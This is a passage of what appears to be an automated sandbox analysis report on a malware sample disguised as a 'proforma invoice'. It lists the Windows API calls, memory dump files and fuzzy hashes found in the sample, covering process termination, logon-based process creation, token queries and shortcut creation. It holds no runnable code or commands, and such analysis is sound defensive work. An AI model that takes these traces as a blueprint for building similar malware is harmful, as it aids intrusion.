                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0035F3AB,00000000,?,?,00000000,?,0035682C,00000004,00000000,00000000), ref: 0039824C
                                    • EnableWindow.USER32(00000000,00000000), ref: 00398272
                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003982D1
                                    • ShowWindow.USER32(00000000,00000004), ref: 003982E5
                                    • EnableWindow.USER32(00000000,00000001), ref: 0039830B
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0039832F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: d1e466946e05424af0cb4fe93d78230dfc943472380f5869e8618c275e43a3e4
                                    • Instruction ID: ca083766e5551881a1acf67c3eb3b4e27c345e96833b61ce63b91e8839dd96e8
                                    • Opcode Fuzzy Hash: d1e466946e05424af0cb4fe93d78230dfc943472380f5869e8618c275e43a3e4
                                    • Instruction Fuzzy Hash: B7419438601644AFDF13CF15D899BE47BF4BB8B714F19516AE5484F262CB32A841CB50
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 00364C95
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00364CB2
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00364CEA
                                    • _wcslen.LIBCMT ref: 00364D08
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00364D10
                                    • _wcsstr.LIBVCRUNTIME ref: 00364D1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                    • String ID:
                                    • API String ID: 72514467-0
                                    • Opcode ID: dc7ef47da803f68df4699d25a21e8a7434a773af90506a3824f912eab52e615d
                                    • Instruction ID: bca4585e491344bce412f69880b8f9968a68c5e562e28ae7ec16cec49a7ff92b
                                    • Opcode Fuzzy Hash: dc7ef47da803f68df4699d25a21e8a7434a773af90506a3824f912eab52e615d
                                    • Instruction Fuzzy Hash: 1C21C672A04210BBEB175B39AC49E7BBBACDF49750F15C02AF805CE196EA61DC4196B0
                                    APIs
                                      • Part of subcall function 00303AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00303A97,?,?,00302E7F,?,?,?,00000000), ref: 00303AC2
                                    • _wcslen.LIBCMT ref: 0037587B
                                    • CoInitialize.OLE32(00000000), ref: 00375995
                                    • CoCreateInstance.OLE32(0039FCF8,00000000,00000001,0039FB68,?), ref: 003759AE
                                    • CoUninitialize.OLE32 ref: 003759CC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 3172280962-24824748
                                    • Opcode ID: e7c11a52cc589efe7cbea670c34f1057a7fa9c7849e32946ff0747341945eeef
                                    • Instruction ID: 139319dd2cc5c0778c2109e90c8f017858ca29e0395ca499f194aca810d5361c
                                    • Opcode Fuzzy Hash: e7c11a52cc589efe7cbea670c34f1057a7fa9c7849e32946ff0747341945eeef
                                    • Instruction Fuzzy Hash: 89D176706047019FC72ADF24C490A2ABBE5FF8A710F15885DF8899B3A1D775EC45CB92
                                    APIs
                                      • Part of subcall function 00360FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00360FCA
                                      • Part of subcall function 00360FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00360FD6
                                      • Part of subcall function 00360FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00360FE5
                                      • Part of subcall function 00360FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00360FEC
                                      • Part of subcall function 00360FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00361002
                                    • GetLengthSid.ADVAPI32(?,00000000,00361335), ref: 003617AE
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003617BA
                                    • HeapAlloc.KERNEL32(00000000), ref: 003617C1
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 003617DA
                                    • GetProcessHeap.KERNEL32(00000000,00000000,00361335), ref: 003617EE
                                    • HeapFree.KERNEL32(00000000), ref: 003617F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 3008561057-0
                                    • Opcode ID: 37e9bfaca8af96683b6af39333f4f8ef42456f6cea1869577d99c429774f678c
                                    • Instruction ID: 002652351be3d44ecd3ffeff0623cbf6c6eef50646f44946d9bc455384392a14
                                    • Opcode Fuzzy Hash: 37e9bfaca8af96683b6af39333f4f8ef42456f6cea1869577d99c429774f678c
                                    • Instruction Fuzzy Hash: 6411D031510205FFDB229FA8CC49BAF7BBDEF41355F188019F44197214D736AA40CB60
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003614FF
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00361506
                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00361515
                                    • CloseHandle.KERNEL32(00000004), ref: 00361520
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0036154F
                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00361563
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1413079979-0
                                    • Opcode ID: 5d133abc3a22076244cfe3f07d8e9857f213b67b2b57cee15cc90db85f91a10c
                                    • Instruction ID: c55cbc950b8b746ac4cfd90793ff9f4b021aa67f90515329b8d20aca34c8e0c5
                                    • Opcode Fuzzy Hash: 5d133abc3a22076244cfe3f07d8e9857f213b67b2b57cee15cc90db85f91a10c
                                    • Instruction Fuzzy Hash: 7C115972501209AFDF129FA8EE49BDE7BADEF48744F098015FA05A2160C376CE60DB60
                                    APIs
                                    • GetLastError.KERNEL32(?,?,00323379,00322FE5), ref: 00323390
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0032339E
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003233B7
                                    • SetLastError.KERNEL32(00000000,?,00323379,00322FE5), ref: 00323409
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: c4af2f474d050cf23ad8f783dcb0ceacb7774eca251d420680ee566534f143d2
                                    • Instruction ID: 6fcea96650d91c5aa6df2f541919886e32c2369e32958264c15107527485f813
                                    • Opcode Fuzzy Hash: c4af2f474d050cf23ad8f783dcb0ceacb7774eca251d420680ee566534f143d2
                                    • Instruction Fuzzy Hash: 81014737319331BEEA2737757CC5A672A9CEB05779B20022AF510C91F0EF2AAE035644
                                    APIs
                                    • GetLastError.KERNEL32(?,?,00335686,00343CD6,?,00000000,?,00335B6A,?,?,?,?,?,0032E6D1,?,003C8A48), ref: 00332D78
                                    • _free.LIBCMT ref: 00332DAB
                                    • _free.LIBCMT ref: 00332DD3
                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0032E6D1,?,003C8A48,00000010,00304F4A,?,?,00000000,00343CD6), ref: 00332DE0
                                    • SetLastError.KERNEL32(00000000,?,?,?,?,0032E6D1,?,003C8A48,00000010,00304F4A,?,?,00000000,00343CD6), ref: 00332DEC
                                    • _abort.LIBCMT ref: 00332DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: dfead653700000f86da73f22154236ca6717a70f848b61c7ea2c45035ef242d5
                                    • Instruction ID: ec24b4a27d21f92f7136c2570cc16f41aad9b014460b59df7e243de6adafa536
                                    • Opcode Fuzzy Hash: dfead653700000f86da73f22154236ca6717a70f848b61c7ea2c45035ef242d5
                                    • Instruction Fuzzy Hash: 0FF0F636545A106BC6233739BCCAF5F265DAFC27A1F264419F838DA1E2EF3998025260
                                    APIs
                                      • Part of subcall function 00319639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00319693
                                      • Part of subcall function 00319639: SelectObject.GDI32(?,00000000), ref: 003196A2
                                      • Part of subcall function 00319639: BeginPath.GDI32(?), ref: 003196B9
                                      • Part of subcall function 00319639: SelectObject.GDI32(?,00000000), ref: 003196E2
                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00398A4E
                                    • LineTo.GDI32(?,00000003,00000000), ref: 00398A62
                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00398A70
                                    • LineTo.GDI32(?,00000000,00000003), ref: 00398A80
                                    • EndPath.GDI32(?), ref: 00398A90
                                    • StrokePath.GDI32(?), ref: 00398AA0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 58ad557d3b8ec1e101c81177c65b579e53e73f8e30c76ba35bea2e76aa498110
                                    • Instruction ID: d477817803239df58424b196ac1a93de3ebf47c20d2efa287139efb0224c4252
                                    • Opcode Fuzzy Hash: 58ad557d3b8ec1e101c81177c65b579e53e73f8e30c76ba35bea2e76aa498110
                                    • Instruction Fuzzy Hash: 8F11C976040149FFEF129F94EC88EEA7F6DEB08354F048012FA199A1A1C7729D55DBA0
                                    APIs
                                    • GetDC.USER32(00000000), ref: 00365218
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00365229
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00365230
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00365238
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0036524F
                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00365261
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    • Opcode ID: 4baaec89c21f381a709ad493769a1ebc4250e27a54b2baee9e1e19048ef35edc
                                    • Instruction ID: 9288b83c3cf39c5e264178906d230e88f9e0a6a1bd4ca3cb16014c12d1a7d870
                                    • Opcode Fuzzy Hash: 4baaec89c21f381a709ad493769a1ebc4250e27a54b2baee9e1e19048ef35edc
                                    • Instruction Fuzzy Hash: 5F018F75A01708BBEB119BA5DC49E4EBFB8EB48351F044066FA04AB280D6719800CBA0
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00301BF4
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00301BFC
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00301C07
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00301C12
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00301C1A
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00301C22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: 20ebf93f0edd43f84704fcee88e72a12dd16710b0854bad1a06c0eb6fcd62d29
                                    • Instruction ID: de6b342ace89356609cd7eb4660f352acab50b705551c950e2fca53d8d9ba693
                                    • Opcode Fuzzy Hash: 20ebf93f0edd43f84704fcee88e72a12dd16710b0854bad1a06c0eb6fcd62d29
                                    • Instruction Fuzzy Hash: B00167B0902B5ABDE3008F6A8C85B52FFA8FF19354F04411BA15C4BA42C7F5AC64CBE5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0036EB30
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0036EB46
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0036EB55
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0036EB64
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0036EB6E
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0036EB75
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 203ec7f9313137f7deb8372ad24b5da5f96df058f1aa89b6e238d7b99e2d9ca8
                                    • Instruction ID: eb0cfa2bb44d8dba305bc2bf73923d1e5a7c18330a074d99571f997a1fa723e5
                                    • Opcode Fuzzy Hash: 203ec7f9313137f7deb8372ad24b5da5f96df058f1aa89b6e238d7b99e2d9ca8
                                    • Instruction Fuzzy Hash: 6FF0BE72250118BBE7225B629C0EEEF7E7CEFCAB11F00115AF601D2090D7A21E01C6B8
                                    APIs
                                    • GetClientRect.USER32(?), ref: 00357452
                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00357469
                                    • GetWindowDC.USER32(?), ref: 00357475
                                    • GetPixel.GDI32(00000000,?,?), ref: 00357484
                                    • ReleaseDC.USER32(?,00000000), ref: 00357496
                                    • GetSysColor.USER32(00000005), ref: 003574B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                    • String ID:
                                    • API String ID: 272304278-0
                                    • Opcode ID: 80b0e67910098c2092270c3c8c38d5ef8c8cb6d3cb2b7d65abb12cdc3d0697a1
                                    • Instruction ID: b8116aee1210b9423e9ad066ee7406f3466d82263d9ad723da433a3ce300a9a2
                                    • Opcode Fuzzy Hash: 80b0e67910098c2092270c3c8c38d5ef8c8cb6d3cb2b7d65abb12cdc3d0697a1
                                    • Instruction Fuzzy Hash: 67018B31410205EFDB125FA5EC08BEA7BB9FB04312F551062FD16A20B0CB321E41EB10
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0036187F
                                    • UnloadUserProfile.USERENV(?,?), ref: 0036188B
                                    • CloseHandle.KERNEL32(?), ref: 00361894
                                    • CloseHandle.KERNEL32(?), ref: 0036189C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003618A5
                                    • HeapFree.KERNEL32(00000000), ref: 003618AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                    • String ID:
                                    • API String ID: 146765662-0
                                    • Opcode ID: 701a2045a2524d4dc3071942e9cf483a47c460e7cc400ffbf912b7b8b6e6caaa
                                    • Instruction ID: 8565e5ad3d6cdbc3188b0894951696f73dc66e5930760a5b112302eb20ebbaa8
                                    • Opcode Fuzzy Hash: 701a2045a2524d4dc3071942e9cf483a47c460e7cc400ffbf912b7b8b6e6caaa
                                    • Instruction Fuzzy Hash: 46E0C236014101BBDA026BA5EE0C90ABB2DFB49B22B109222F22581070CB339420DB64
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0030BEB3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: D%=$D%=$D%=$D%=D%=
                                    • API String ID: 1385522511-2666785572
                                    • Opcode ID: 68aef81d6fedb8d0c56ff11bdbd20ee05c2c332ccdd801356c81e5ec63e6eb36
                                    • Instruction ID: 32ca8fe0aa32294e773165189976463882eb4ff70735c43d1ac000518ab6914a
                                    • Opcode Fuzzy Hash: 68aef81d6fedb8d0c56ff11bdbd20ee05c2c332ccdd801356c81e5ec63e6eb36
                                    • Instruction Fuzzy Hash: 66916B75A0120ACFCB19CF59D0A0AAAF7F6FF59310F25816AD941AB390D731ED81CB90
                                    APIs
                                      • Part of subcall function 00320242: EnterCriticalSection.KERNEL32(003D070C,003D1884,?,?,0031198B,003D2518,?,?,?,003012F9,00000000), ref: 0032024D
                                      • Part of subcall function 00320242: LeaveCriticalSection.KERNEL32(003D070C,?,0031198B,003D2518,?,?,?,003012F9,00000000), ref: 0032028A
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 003200A3: __onexit.LIBCMT ref: 003200A9
                                    • __Init_thread_footer.LIBCMT ref: 00387BFB
                                      • Part of subcall function 003201F8: EnterCriticalSection.KERNEL32(003D070C,?,?,00318747,003D2514), ref: 00320202
                                      • Part of subcall function 003201F8: LeaveCriticalSection.KERNEL32(003D070C,?,00318747,003D2514), ref: 00320235
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                    • String ID: +T5$5$G$Variable must be of type 'Object'.
                                    • API String ID: 535116098-1988379522
                                    • Opcode ID: 2cc40785f9cfd0c1da122aadc89031ef04b1c53f15d25484af9c48ed3df8d5da
                                    • Instruction ID: b4a8b0c75e7cdaa13f668147a3dab8d6b8d3d7632f01a324b40b1cc9965ad6ee
                                    • Opcode Fuzzy Hash: 2cc40785f9cfd0c1da122aadc89031ef04b1c53f15d25484af9c48ed3df8d5da
                                    • Instruction Fuzzy Hash: 5C916974A04309EFCB16EF54D8919ADB7B6FF49300F248099F806AB292DB71EE45CB51
                                    APIs
                                      • Part of subcall function 00307620: _wcslen.LIBCMT ref: 00307625
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0036C6EE
                                    • _wcslen.LIBCMT ref: 0036C735
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0036C79C
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0036C7CA
                                    Strings
                                    Memory Dump Source
